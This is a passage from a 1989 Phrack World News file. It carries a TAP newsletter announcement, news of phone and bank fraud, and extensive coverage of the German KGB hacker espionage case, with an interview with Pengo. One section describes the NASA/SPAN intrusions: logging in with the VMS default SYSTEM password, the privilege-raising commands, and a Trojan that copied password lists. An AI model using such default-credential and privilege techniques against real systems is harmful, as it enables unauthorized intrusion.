  2762. By Aristotle and the TAP Magazine Staff
  2763.  
  2764.  
  2765. How TAP Will Be Printed
  2766.  
  2767. TAP will be created, edited, and printed on various machines that the staff
  2768. either owns or has full access to.  The computers range from personal computers
  2769. to mainframes.
  2770.  
  2771. The printing devices range from dot-matrix printers to industrial laser
  2772. printers.  Again, the staff has full access to all of these devices.  In order
  2773. to upgrade the quality of print and to take some of the load off of the staff,
  2774. the staff is looking into getting TAP printed by a professional printer.
  2775.  
  2776.  
  2777. Funding Of TAP
  2778.  
  2779. Hopefully TAP will be funded majorly by the subscribers.  Unlike TAP in it's
  2780. early years, we cannot afford to just give TAP away.  Except for issue 92, we
  2781. will not GIVE TAP away for free.  We feel the policy of the old TAP towards
  2782. this issue was the major cause of their cronic shortage of money.  As far as
  2783. startup costs, the staff can support all costs except for Printing, Paper, and
  2784. Postage.  For 1.00 an issue, we feel we should be able to sufficiently support
  2785. TAP from the subscribers fees.  All money received will be put into an account
  2786. that will be used for TAP purposes ONLY.  There will be no distributing of
  2787. wealth between the staff.  The three expenses above will be the major areas of
  2788. spending with an occasional expense of advertising and such.
  2789.  
  2790.  
  2791. How TAP Will Be Getting Articles
  2792.  
  2793. As of right now, the staff has enough articles ready to be printed to support
  2794. TAP for at least 4 issues.  We hope TAP will become dependant on articles
  2795. submitted by subscribers.  If people do not submit articles to TAP, we will be
  2796. forced to fill up space with lesser articles (thus lessening the quality of
  2797. TAP.)  We figure that at the worst, TAP can sustain itself for one year with NO
  2798. submitted articles.  That way we will not be ripping anyone off and we can fade
  2799. away in peace. (Hopefully we won't have to do that!)
  2800.  
  2801.  
  2802. Who is involved with TAP
  2803.  
  2804. As of 03/07/89, the TAP staff consists of five people.  These 'staffers' are:
  2805. Aristotle, Olorin The White, Predat0r, and two others that wish to remain
  2806. anonymous.  The last two have elected to remain anonymous for various reasons,
  2807. one being to maintain their freedom.  The staff does not feel that we need to
  2808. list names in TAP (yet) to give the newsletter a good reputation.  We feel that
  2809. readers should subscribe to TAP because of the quality of the newsletter and
  2810. not because of the staff members.  Of course, if you submit an article, you
  2811. will be given credit where it is due.  Credit to the author of any article we
  2812. print will be given unless the author expresses wishes that he/she does not
  2813. want to be recognized.  Of course if TAP cannot find the name of the author of
  2814. a specific article, we cannot print the credits.
  2815.  
  2816.  
  2817. Why We Decided To Print A Newsletter
  2818.  
  2819. After gathering information from bulletin boards and other sources, various
  2820. members of the staff decided that they would like to print hard to obtain
  2821. information in hardcopy form and an easy to understand format.  We feel that
  2822. certain information cannot be successfully represented and distributed with
  2823. computers only.  One excellent example is a schematic of any device.  We all
  2824. know how bad ASCII schematics suck.  And with practically everyone in the
  2825. community owning a different computer, how can we communicate efficiently?
  2826. Well, printed material (on paper) is our answer.
  2827.  
  2828. In addition to the advantage print has over text files, there are various other
  2829. reasons for our wanting to print a newsletter.  Due to the lack of experts
  2830. wanting to teach newcomers to the community (excluding certain individuals), we
  2831. have decided to do something about it.  TAP will attempt to explain information
  2832. so that EVERYONE can understand it.  We will not hesitate to help any
  2833. beginners, nor hesitate to give information to the more experienced members of
  2834. the community.  All members of the community will be supported by TAP.  TAP is
  2835. an equal opportunity informer.
  2836.  
  2837.  
  2838. Why We Decided To Print TAP
  2839.  
  2840. When we first received our collection of TAP issues (along with some 2600's),
  2841. we were astounded.  After learning from bbs's and voice calls, the value of TAP
  2842. and 2600 were obvious.  We liked 2600 a lot, but we LOVED TAP.  TAP fit our
  2843. personalities perfectly.  It has something for everyone.  Around that time, we
  2844. promptly looked into subscribing to the two magazines.  As you know, TAP died
  2845. in 1984 and 2600 is still in print.  Well, we subscribed to 2600 and kept on
  2846. studying our old TAP issues.  When the suggestion came to put out a magazine,
  2847. the first idea that was suggested was TAP.  It was decided after a LONG
  2848. discussion that TAP would be perfect for our newsletter.  Since we are
  2849. interested in hacking, phreaking, AND other topics, we felt TAP better
  2850. expressed our opinions and ideas than any other newsletter idea.  Hell, we just
  2851. straight up loved that old TAP and we cannot pass up the opportunity to bring
  2852. it back into existence and (hopefully) it's original glory.
  2853.  
  2854.  
  2855. Where To Find TAP
  2856.  
  2857. If you have any other questions regarding TAP, you can contact the staff via
  2858. snail mail (US postal service) or via staff accounts on the bulletin boards
  2859. listed below.
  2860.  
  2861. US Mailing Address:                   TAP
  2862.                                 P.O. Box 20264
  2863.                              Louisville, KY 40220
  2864.  
  2865. Beehive BBS - 703-823-6591
  2866. Hackers Den - 718-358-9209
  2867. Ripco       - 312-528-5020
  2868.  
  2869.  
  2870. Thank you,    Tap Staff
  2871.  
  2872. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  2873. Editor's Comments
  2874. ~~~~~~~~~~~~~~~~~
  2875. Upon first hearing about the newly formed TAP Magazine, I scoffed and thought
  2876. it would be another pipe dream like many other countless previous attempts.  To
  2877. my surprise, the magazine was delivered just like they promised.
  2878.  
  2879. Issue 92 contained the following:
  2880.  
  2881. TAP RAP - Basically the staff's remarks about the new magazine and the
  2882.           subscription information.
  2883.  
  2884. A BIT on BITNET (An Introduction to BITNET) - This was a reprint of Aristotle's
  2885.                 Bitnet file that appeared in P/HUN Newsletter Issue 3.
  2886.  
  2887. BELL PAYS for Evil deeds - News article about Cincinnati Bell Telephone Co.
  2888.  
  2889. TMC PIN - Information about PIN codes of TeleMarketing Company.
  2890.  
  2891. Pyro-How To - How to make Nitrogen Tri-Iodide.
  2892.  
  2893. Miscellaneous catalog information for Loompanics Unlimited and Specialized
  2894. Products Company.
  2895.  
  2896. Big Brother section - An article about revenge tactics and social engineering
  2897.                       taken from Flagship News (employee publication of
  2898.                       American Airlines).  The article was also previously seen
  2899.                       in RISKS Digest.
  2900.  
  2901. TELEPHONE CONTROLLED TAPE STARTER + Schematics
  2902.  
  2903. The infamous "Ma Bell Is A Cheap Mother" logo and a few other surprises are
  2904. also included in this issue.  The last part of the newsletter lists
  2905. information that the TAP Staff is looking for.
  2906.  
  2907. My reaction to the issue was positive over all.  The print quality was very
  2908. good and extremely readable.  The issue itself was a bit crumpled up by the US
  2909. Postal Service, but that is to be expected.  The first issue was a test
  2910. product and that is the reason for a little bit of un-original material, says
  2911. Aristotle.
  2912.  
  2913. It is my understanding that the future holds all sorts of neat articles and
  2914. overall it would appear that at $12.00 a year, the new TAP is a good
  2915. investment.
  2916.  
  2917. :Knight Lightning
  2918. _______________________________________________________________________________
  2919.  
  2920. Two Men Seized As Phone Looters                                  March 13, 1989
  2921. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  2922. Two phony repairmen wearing stolen Illinois Bell hardhats and carrying around
  2923. stolen repairman tools have demonstrated that ripping off payphones is not
  2924. small change.
  2925.  
  2926. Arrested in Chicago, Illinois last week were George W. Parratt, age 47, of Sauk
  2927. Village, IL and Arthur P. Hopkinson, age 40, of Hickory Hills, IL; two south
  2928. suburbs of Chicago.
  2929.  
  2930. The two men, posing as Illinois Bell repairmen and driving a white and blue van
  2931. disguised to look like an Illinois Bell truck, have stolen thousands of dollars
  2932. from pay telephones all over Chicago.  Their average take was about $200 per
  2933. phone -- and they have hit some phones two or three times.
  2934.  
  2935. Just the cost of repairing the phones damaged in the past year cost more than
  2936. $50,000 said Illinois Bell Telephone spokesman Tony Abel.
  2937.  
  2938. These two fellows were making a full time living looting pay phones, although
  2939. Mr. Abel did not have the final total of the amount looted immediately
  2940. available when we discussed the case.
  2941.  
  2942. Abel said Illinois Bell employees spotted the phony van on two separate days
  2943. and notified the security department of Bell.  Security representatives were
  2944. able to trace the license plate on the van, and they found it parked in
  2945. Parratt's driveway.  The investigators secretly followed the van and watched
  2946. Parratt and Hopkinson loot two pay phones in Calumet City, Illinois, and two in
  2947. Hammond, Indiana; a community on the stateline served by Illinois Bell.
  2948.  
  2949. When the two men drove back across the stateline into Calumet City, and started
  2950. breaking into another payphone, the investigators arrested them.  Cook County
  2951. sheriff's Lt. Thomas Oulette, called to the scene, said the two had $120 in
  2952. change and $650 in stolen tools from Illinois Bell at the time of their arrest.
  2953. He said they were able to break into a coin box, dump it and get away in less
  2954. than three minutes.
  2955.  
  2956. "It was a pretty good scam," said Oulette, who noted that the investigators
  2957. from Illinois Bell told him they believed the company had been hit by the pair
  2958. for about $35,000 in the nine months the company was specifically aware of them
  2959. without knowing who they were.
  2960.  
  2961. Parratt and Hopkinson were released on bond, and are scheduled to appear in
  2962. Circuit Court (Markham, Illinois branch) on April 17, 1989.
  2963.  
  2964.                     Information Provided by Patrick Townson
  2965. _______________________________________________________________________________
  2966.  
  2967. Bank Fraud Was "Easy"                                         February 24, 1989
  2968. ~~~~~~~~~~~~~~~~~~~~~
  2969. >From The Independent (London)
  2970.  
  2971. "A 17-year-old junior cashier cheated the National Westminster Bank out of 1
  2972. million pounds in a computer fraud," a court heard yesterday.
  2973.  
  2974. Judge Helen Palin criticized the bank for lax security and refused to make a
  2975. compensation order for 15,000 pounds which the bank has not been able to
  2976. recover.
  2977.  
  2978. After being given access to the bank's computer system he began by paying 10
  2979. pounds into his own account.  He then paid himself 12,000 in imaginary cheques.
  2980. Later, he transferred a credit for 984,252 pounds into the account of a friend
  2981. and celebrated by buying 50 bottles of champagne.
  2982.  
  2983. The judge said, "One of the worrying features of this case is that a young man
  2984. who hasn't long left school is able to work the system in the NatWest bank on a
  2985. number of occasions without being found out.  Indeed, the general chat within
  2986. the bank seems to be how easy it is to defraud that bank."
  2987. _______________________________________________________________________________
  2988.  
  2989. Two Men Accused Of "Hacker" Crime                             February 24, 1989
  2990. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  2991. By James Gribble (Milwaukee Journal)
  2992.  
  2993. Vowing to step up efforts to stop computer crime, a Milwaukee County prosecutor
  2994. has charged two Milwaukee men with fraudulently obtaining free long-distance
  2995. telephone service.
  2996.  
  2997. The felony charges filed Thursday against Alan Carr, age 35 and David Kelsey,
  2998. age 26 are the first so-called hacker crimes to be prosecuted by the district
  2999. attorney's office.
  3000.  
  3001. Working independently, using home computers and similar software programs, the
  3002. men are alleged to have obtained calling card codes for customers of an
  3003. independent long-distance telephone company, Schneider Communications.
  3004.  
  3005. They then used the codes to bill their personal calls to Schneider's customers,
  3006. according to a criminal complaint prepared by Assistant District Attorney Jon
  3007. N. Reddin, head of the district attorney's White Collar Crime Unit.
  3008.  
  3009. Reddin said the total theft probably was less than $1,000, but he said the case
  3010. reflected a growing problem.
  3011.  
  3012. "I have the feeling, from our investigation, that there's a lot of people out
  3013. there doing this," he said.  "The only way to stop it is to prosecute them,
  3014. because this is theft.  It's almost like some one stealing your credit card and
  3015. using it to make purchases."
  3016.  
  3017. Schneider Communications was the victim in this case, Reddin said, because the
  3018. company had to write off the customer billings for which Carr and Kelsey turned
  3019. out to be responsible.
  3020.  
  3021. According to court records and Reddin, the investigation was prompted by a
  3022. complaint from Schneider Communications.
  3023.  
  3024. The company's computer keeps track of all calls that are rejected because of an
  3025. improper access code.  Clients dialing incorrectly would cause 10 to 30
  3026. rejected calls a month, but sometime last year the number jumped to 1,000 or
  3027. 2,000 per month.
  3028.  
  3029. Computer printouts showed the unknown parties were repeatedly dialing the
  3030. computer and changing the access code sequentially, Reddin said.  Hundreds of
  3031. calls at a time were being made in this fashion, and each time the code was
  3032. changed one digit at a time until a working code was encountered.
  3033.  
  3034. Because the company had no way of knowing where the calls were coming from,
  3035. Wisconsin Bell placed a tracing device on the line, through which the calls
  3036. were traced to the phone numbers of Carr and Kelsey.
  3037.  
  3038. The men were apparently unaware of each other and simply happened to be
  3039. involved in similar schemes, Reddin said.
  3040.  
  3041. Carr is alleged to have used a bootleg computer program called "Hacking
  3042. Construction Set Documentation."  Kelsey is alleged to have used a similar
  3043. bootleg program called "Mickey-Dialer."  The programs were seized in raids at
  3044. the defendant's houses, according to court records.
  3045.  
  3046. Reddin acknowledged that technological safeguards can detect such thefts after
  3047. the fact but not prevent them.  What Carr and Kelsey are alleged to have done
  3048. can be done by any computer buff with the right software and know-how, Reddin
  3049. said.
  3050.  
  3051. The key to deterring computer crime, in Reddin's view, lies in it's prompt
  3052. reporting to authorities.
  3053.  
  3054. "The best way I can think of to do that is by filing a complaint with our
  3055. office," Reddin said.
  3056. _______________________________________________________________________________
  3057.  
  3058.                                 ==Phrack Inc.==
  3059.  
  3060.                     Volume Three, Issue 25, File 10 of 11
  3061.  
  3062.             PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
  3063.             PWN                                                 PWN
  3064.             PWN        P h r a c k   W o r l d   N e w s        PWN
  3065.             PWN        ~~~~~~~~~~~   ~~~~~~~~~   ~~~~~~~        PWN
  3066.             PWN                Issue XXV/Part 2                 PWN
  3067.             PWN                                                 PWN
  3068.             PWN                 March 29, 1989                  PWN
  3069.             PWN                                                 PWN
  3070.             PWN          Created, Written, and Edited           PWN
  3071.             PWN               by Knight Lightning               PWN
  3072.             PWN                                                 PWN
  3073.             PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
  3074.  
  3075.  
  3076. German Hackers Break Into Los Alamos and NASA                     March 2, 1989
  3077. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  3078. Three hours ago, a famous German TV-magazine revealed maybe one of the greatest
  3079. scandals of espionage in computer networks:  They talk about some (three to
  3080. five) West German hackers breaking into several secret data networks (Los
  3081. Alamos, Nasa, some military databases, (Japanese) war industry, and many
  3082. others) in the interests of the KGB, USSR.  They received sums of $50,000 to
  3083. $100,000 and even drugs, all from the KGB, the head of the political
  3084. television-magazine said.
  3085.  
  3086. The following news articles (and there are a lot) all deal with (directly and
  3087. indirectly) the recent Spy scandal situation that occurred in West Germany.
  3088. The majority of the articles shown here are taken from RISKS Digest, but they
  3089. have been edited for this presentation.
  3090.  
  3091. This presentation contains some information not previously seen (at least not
  3092. in this format).
  3093. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  3094.  
  3095. Computer Espionage:  Three "Wily Hackers" Arrested                March 2, 1989
  3096. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  3097. Three hackers have been arrested in Berlin, Hamburg and Hannover, and they are
  3098. accused of computer espionage for the Soviet KGB.  According to the television
  3099. magazine "Panorama" (whose journalists have first published the NASA and SPAN
  3100. hacks), they intruded scientific, military and industry computers and gave
  3101. passwords, access mechanisms, programs and data to 2 KGB officers; among
  3102. others, intrusion is reported of the NASA headquarters, the Los Alamos and
  3103. Fermilab computers, the United States Chief of Staff's data bank OPTIMIS, and
  3104. several more army computers.  In Europe, computers of the French-Italian arms
  3105. manufacturer Thomson, the European Space Agency ESA, the Max Planck Institute
  3106. for Nuclear Physics in Heidelberg, CERN/GENEVA and the German Electron
  3107. Accelerator DESY/Hamburg are mentioned.  The report says that they earned
  3108. several 100,000 DM plus drugs (one hacker evidently was drug addict) over about
  3109. 3 years.
  3110.  
  3111. For the German Intelligence authorities, this is "a new quality of espionage."
  3112. The top manager said that they had awaited something similar but are
  3113. nevertheless surprised that it happened so soon and with such broad effects.
  3114.  
  3115. Summarizing the different events which have been reported earlier -- NASA and
  3116. SPAN hacks, Clifford Stoll's report of the "Wily Hacker" -- I regard this as
  3117. essentially the final outcome of the Wily Hackers story (with probably more
  3118. than the 3 which have now been imprisoned).  It is surprising that the
  3119. Intelligence authorities needed so long time (after Cliff's Communications Of
  3120. The ACM report, in May 1988) to finally arrest and accuse these crackers.
  3121. Moreover, the rumors according to which design and production plans of a
  3122. Megabit chip had been stolen from Philips/France computers seems to become
  3123. justified; this was the background that CCC hacker Steffen Wernery had been
  3124. arrested, for several months, in Paris without being accused.  CAD/CAM programs
  3125. have also been sold to KBG.
  3126.  
  3127.                             Information Provided By
  3128.                                Klaus Brunnstein
  3129. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  3130. Computer Spy Ring Sold Top Secrets To Russia                      March 3, 1989
  3131. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  3132. West German counter-intelligence has uncovered a spy ring centered on computer
  3133. hackers suspected of having supplied the Soviet Union with top secret military
  3134. and economic information.
  3135.  
  3136. They are said to have penetrated computer networks in the United States,
  3137. Western Europe and Japan, according to a television report last night.
  3138.  
  3139. In a special program, the North German Broadcasting Network said that thousands
  3140. of computer codes, passwords and programs which allowed the Soviet Union access
  3141. to major computer centers in the Western world have been passed on by the
  3142. hackers.  They had been recruited by the KGB in 1985 and are alleged to have
  3143. supplied the information in return for money and drugs.
  3144.  
  3145. In Karlsruhe, the West German Chief Public Prosecutor's Office, which is in
  3146. charge of spy cases, would only confirm last night that three arrests have been
  3147. made March 2nd during house searches in Hannover and West Berlin.
  3148.  
  3149. Those detained were suspected of "having obtained illegally, through hacking
  3150. and in exchange for money, information which was passed on to an Eastern secret
  3151. service."
  3152.  
  3153. But the spokesman did not share West German television's evaluation, which said
  3154. the case was the most serious since the unmasking in 1974 of an East German
  3155. agent in the office of ex-Chancellor Willy Brandt.  The Interior Ministry in
  3156. Bonn last night also confirmed several arrests and said the suspects had
  3157. supplied information to the KGB.  The arrests followed months of investigations
  3158. into the activities of young computer freaks based in Hamburg, Hannover and
  3159. West Berlin, the ministry said.
  3160.  
  3161. According to the television report, the hackers gained access to the data banks
  3162. of the Pentagon, NASA Space Center, and the nuclear laboratory in Los Alamos.
  3163.  
  3164. They also penetrated leading West European computer centers and armament
  3165. companies, including the French Thomson group, the European Nuclear Research
  3166. Center, CERN, in Geneva; the European Space Authority, ESA, and German
  3167. companies involved in nuclear research.
  3168.  
  3169. The Russians are alleged to have put pressure on the hackers because of their
  3170. involvement with drugs, and to have paid several hundred thousands marks for
  3171. information, the program said.
  3172.  
  3173. West German security experts on the evening of March 2nd described the new spy
  3174. case as "extremely grave."  The KGB has been provided with a "completely new
  3175. possibility of attack" on Western high technology and NATO military secrets.
  3176. The sources said it was "sensational" that the hackers should have succeeded in
  3177. penetrating the US defense data systems from Western Europe.
  3178.  
  3179. The North German Broadcasting Network program said its research was based on
  3180. information given by two members of the suspected espionage ring.
  3181. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  3182. KGB Computer Break-Ins Alleged In West Germany                    March 3, 1989
  3183. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  3184. Taken From the International Herald Tribune
  3185.  
  3186. Bonn - Three West German computer hackers have been arrested on suspicion of
  3187. infiltrating computer networks worldwide to obtain secret data for an East
  3188. block intelligence service, prosecutors said on March 2nd.
  3189.  
  3190. A spokesman for the federal prosecutor, Alexander Prechtel, confirmed that
  3191. three men were arrested, but did not identify the East Block country involved
  3192. or the networks infiltrated.
  3193.  
  3194. The ARD television networks "Panorama" program, the thrust of which the
  3195. spokesman confirmed, said the hackers had passed secrets from a range of highly
  3196. sensitive U.S., French, and West German computer networks to the KGB, the
  3197. Soviet secret police.
  3198.  
  3199. The television report said it was the worst such espionage case to be uncovered
  3200. in West Germany since the 1974 exposure of Guenter Guillaume, an East German
  3201. spy who was a top aide to Willy Brandt, then the West German chancellor.
  3202.  
  3203. Among the systems believed to have been infiltrated were the U.S.:  Defense
  3204. Department's staff data bank, the U.S. nuclear arms laboratory in Los Alamos,
  3205. New Mexico, the National Aeronautics and Space Administration, and U.S.
  3206. military supply depots.
  3207.  
  3208. The report said other systems entered were at the French arms and electronics
  3209. company Thomson SA, a European nuclear-research center in Geneva, the European
  3210. Space Agency and the Max-Planck Institute for Nuclear Physics in West Germany.
  3211. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  3212. News From The KGB/Wily Hackers                                    March 7, 1989
  3213. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  3214. Now, five days after the "sensational" disclosure of the German (NDR) Panorama
  3215. Television team, the dust of speculations begins to rise and the facts become
  3216. slowly visible; moreover, some questions which could not be answered in
  3217. Clifford Stoll's Communications of the ACM paper may now be answered.  Though
  3218. not all facts are known publicly, the following facts seem rather clear.
  3219.  
  3220.     - In 1986, some hackers from West Berlin and Hannover discussed, in "hacker
  3221.       parties" with alcohol and drugs, how to solve some personal financial
  3222.       problems; at that time, first intrusions of scientific computers
  3223.       (probably CERN/Geneva as hacker training camp) and Chaos Computer Club's
  3224.       spectacular BTX-intrusion gave many hackers (assisted by newsmedia) the
  3225.       *puerile impression* that they could intrude *into every computer
  3226.       system*; I remember contemporary discussions on 1986/87 Chaos Computer
  3227.       Conferences about possibilities, when one leading CCC member warned that
  3228.       such hacks might also attract espionage (Steffen Wernery recently
  3229.       mentioned that German counter-espionage had tried several times to hire
  3230.       him and other CCC members as advisors -- unsuccessfully).
  3231.  
  3232.     - A "kernel group" of 5 hackers who worked together, in some way, in the
  3233.       "KGB case" are (according to Der SPIEGEL, who published the following
  3234.       names in its Monday, March 6, 1989 edition):
  3235.  
  3236.       -> Markus Hess, 27, from Hannover, Clifford Stoll's "Wily Hacker" who was
  3237.          often referred to as the Hannover Hacker and uses the alias of Mathias
  3238.          Speer; after having ended (unfinished) his studies in mathematics, he
  3239.          works as programmer, and tries to get an Informatics diploma at the
  3240.          University of Hagen (FRG); he is said to have good knowledge of VMS
  3241.          and UNIX.
  3242.  
  3243.       -> Karl Koch, 23, from Hannover, who works as programmer; due to his
  3244.          luxurious lifestyle and his drug addiction, his permanent financial
  3245.          problems have probably added to his desire to sell "hacker knowledge"
  3246.          to interested institutions.
  3247.  
  3248.       -> Hans Huebner, alias "Pengo," from Berlin, who after having received
  3249.          his Informatics diploma from Technical University of West Berlin,
  3250.          founded a small computer house; the SPIEGEL writes that he needed
  3251.          money for investment in his small enterprise; though he does not
  3252.          belong to the Chaos Computer Club, he holds close contacts to the
  3253.          national hacker scenes (Hamburg: Chaos Computer Club; Munich: Bavarian
  3254.          Hacker Post; Cologne: Computer Artists Cologne, and other smaller
  3255.          groups), and he was the person to speak about UUCP as a future
  3256.          communications medium at the Chaos Communication Congress.
  3257.  
  3258.       -> Dirk Brezinski, from West Berlin, programmer and sometimes
  3259.          "troubleshooter" for Siemens BS-2000 systems (the operating system of
  3260.          Siemens mainframe computers), who earned, when working for Siemens or
  3261.          a customer (BfA, a national insurance for employees) 20,000 DM (about
  3262.          $10,800) a month; he is regarded (by an intelligence officer) as "some
  3263.          kind of a genius."
  3264.  
  3265.       -> Peter Carl, from West Berlin, a former croupier, who "always had
  3266.          enough cocaine."  No information about his computer knowledge or
  3267.          experience is available.
  3268.  
  3269. After successfully stimulating KGB's interest, the group (mainly Hess and Koch)
  3270. committed their well-documented hacks [See Clifford Stoll's "Stalking the Wily
  3271. Hacker," Communications of the ACM, May 1988].  SPIEGEL writes that the group
  3272. *sold 5 diskettes full of passwords*, from May to December 1986, to KGB
  3273. officers which they met in East Berlin; when Bremen University computer center,
  3274. their favorite host for transatlantic hacks, asked the police to uncover the
  3275. reasons for their high telephone bills, they stopped the action.
  3276.  
  3277. This statement of Der SPIEGEL is probably wrong because, as Cliff describes,
  3278. the "Wily Hacker" successfully worked until early 1988, when the path from his
  3279. PC/telephone was disclosed by TYMNET/German Post authorities.  The German
  3280. public prosecutors did not find enough evidence for a trial, when examining
  3281. Hess' apartment; moreover, they had acquired the material in illegal actions,
  3282. so the existing evidence could not be used and finally had to be scratched!
  3283.  
  3284. In Hess' apartment, public prosecutors found (on March 3, 1989) password lists
  3285. from other hacks.  On Monday, March 6, 1989, the Panorama team (who had
  3286. disclosed the NASA hack and basically the KGB connection) asked Klaus
  3287. Brunnstein to examine some of the password lists; the material which he saw
  3288. (for 30 minutes) consisted of about 100 photocopied protocols of a hack during
  3289. the night of July 27 to 28, 1987; it was the famous "NASA hack."  From a VAX
  3290. 750 (with VMS 4.3), which they entered via DATEX-P (the German packed-switched
  3291. data-exchange network, an X.25 version), where they evidently previously had
  3292. installed a Trojan horse (UETFORT00.EXE), they tried, via SET HOST... to
  3293. log-into other VAXes in remote institutes.  They always used SYSTEM account and
  3294. the "proper" password (invisible).
  3295.  
  3296. Remark:  Unfortunately, DEC's installation procedure works only if a SYSTEM
  3297.          account is available; evidently, most system managers do not change
  3298.          the preset default password MANAGER; since Version 4.7, MANAGER is
  3299.          excluded, but on previous VMS versions, this hole probably exists in
  3300.          many systems!
  3301.  
  3302. Since the hackers, in more than 40% of the cases, succeeded to login, their
  3303. first activities were to SET PRIV=ALL; SET PRIO=9, and then to install (via
  3304. trans-net copy) the Trojan horse.  With the Trojan horse (not displayed under
  3305. SHow Users), they copied the password lists to their PCs.  When looking through
  3306. the password list, Klaus observed the well-known facts:  More than 25% female
  3307. or male first names, historical persons, countries, cities, or local dishes (in
  3308. the Universities of Pisa, Pavia, and Bologna, INSALATA was/is a favorite
  3309. password of several people).  Only in CASTOR and POLLUX, the password lists
  3310. contained less than 5% passwords of such nature easy to guess!
  3311.  
  3312. Apart from many (about 39) unsuccessful logins, many different CERN/GENEVA,
  3313. NASA systems (CASTOR, POLLUX, Goddard and Ames Space Flight Centers), several
  3314. USA, GB, French, Italian and some German institutes connected in SPAN were
  3315. "visited."  The documented session was from July 27, 10 p.m. to July 28, 1 a.m.
  3316.  
  3317. The media report that other hacks (probably not all committed by Hess and Koch
  3318. themselves) were sold to KGB.  Among them, Electronic and Computer Industry
  3319. seem to be of dominant interest for the USSR.  If special CAD/CAM programs and
  3320. Megabit designs (especially from Thomson/France, from VAX systems) have been
  3321. stolen, the advantage and value for the USSR cannot be (over)estimated.
  3322.  
  3323. In FRG, the current discussion is whether the hackers succeeded to get into
  3324. "kernel areas" or only "peripheral areas."  This discussion is ridiculous since
  3325. most "peripheral systems" contain developments (methods, products) for future
  3326. systems, while the "kernel systems" mainly contain existing applications (of
  3327. past architectures).
  3328.  
  3329. The well-known hackers (especially CCC) have been seriously attacked by some
  3330. media.  My best guess is that CCC was itself *a victim* because the group
  3331. succeeded to informally get much of the information which they needed for some
  3332. of the hacks, and which they finally sold to KGB.  Apart from "Pengo," there
  3333. doesn't seem to be a close relation between CCC and the KGB/Wily Hackers.
  3334. Nevertheless, CCC and others, like Cheshire Catalyst in the USA, have prepared
  3335. a climate where espionage inevitably sprang-off.
  3336.  
  3337.                             Information Provided By
  3338.                                Klaus Brunnstein
  3339. _______________________________________________________________________________
  3340.  
  3341. Pengo Speaks Out About The KGB Hackers And More                  March 10, 1989
  3342. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  3343. The following are statements made by Pengo to Phrack Inc. during an interview
  3344. with Knight Lightning;
  3345.  
  3346. KL:  What is your response to the accusations of being a KGB spy?
  3347.  
  3348. P:   I have been involved into this espionage circle throughout some months in
  3349.      1986.  I did not actually work for the KGB, nor did I hand out hacker
  3350.      information to the East.  All my hacking activities since then have been
  3351.      for the pure purpose of personal enlightenment.  I never hid my name
  3352.      before, and I won't go undercover now that the real story comes to the
  3353.      surface.
  3354.  
  3355.      In the middle of 1988, I informed the West German authorities (secret
  3356.      service) about my involvement with the KGB.  This is one of the main
  3357.      reasons for the big busts last week.  I have to live with the fact that
  3358.      some hackers now think I am working for the authorities now.  I don't, and
  3359.      I will try anything to avoid getting into all these secret
  3360.      service/espionage problems again.
  3361.  
  3362. KL:  What about the statements made in DER SPIEGEL?
  3363.  
  3364. P:   They published my name and claimed that I was "very active" for the east,
  3365.      but also that I am the :most hopeful head in West Berlin's hacking scene."
  3366.      I now try to make the best out of this publicity.
  3367.  
  3368. KL:  Klaus Brunnstein made some strong statements about you in RISKS Digest,
  3369.      what did you think of that?
  3370.  
  3371. P:   It really upsets me a lot.  Klaus Brunnstein doesn't know anything
  3372.      detailed about this case, but he seems to love seeing himself as the
  3373.      insider in the German scene. At the last congress I got in kind of a
  3374.      dispute with him.  He could not understand why I, as a computer scientist,
  3375.      still support hackers.  Perhaps this is one of the reasons for his
  3376.      publication.
  3377.  
  3378. KL:  Any other comments?
  3379.  
  3380. P:   What I would be interested in hearing about the reaction to this situation
  3381.      from the United States hackers' point of view.  I have already heard that
  3382.      most people seem to believe that the whole Chaos Computer Club is an
  3383.      association of spies.  This is of course untrue.
  3384.  
  3385. KL:  What do you intend to do about the bad press you have received?
  3386.  
  3387. P:   I have posted a reply to Brunnstein's posting in RISKS (shown in next
  3388.      article).  Apart from Hagbard, those guys never were hackers, and it seems
  3389.      to turn out that they have really been mere spies.
  3390.  
  3391. KL:  Were there any other repercussions to this case besides bad publicity?
  3392.  
  3393. P:   Currently, I'm puzzling out a new way of earning money, since my company
  3394.      decided to fire me.  That's what you get if you play with fire :-)
  3395.  
  3396.      Luckily, I'm optimist!
  3397.  
  3398. -Pengo
  3399. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  3400. Pengo Speaks In RISKS Digest                                     March 10, 1989
  3401. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  3402. In RISKS Digest, Klaus Brunnstein mentioned my name in the context of the
  3403. hacker/espionage case recently discovered by the German authorities.  Since Mr.
  3404. Brunnstein is not competent to speak about the background of the case, I'd like
  3405. to add some clarification to prevent misunderstandings, especially concerning
  3406. my role.  I think it is a very bad practice to just publish names of people
  3407. without giving background information.
  3408.  
  3409. I have been an active member of the net community for about two years now, and
  3410. I want to explicitly express that my network activities have in no way been
  3411. connected to any contacts to secret services, be it Western or Eastern ones.
  3412.  
  3413. On the other hand, it is a fact that when I was younger (I'm 20 years old now),
  3414. there had been a circle of people which tried to make deals with an eastern
  3415. secret service.  I have been involved in this, but I hope that I did the right
  3416. thing by giving the German authorities detailed information about my
  3417. involvement in the case in the summer of 1988.
  3418.  
  3419. As long as the lawsuit on this case is still in progress, I am not allowed to
  3420. give out any details about it to the public.  As soon as I have the freedom to
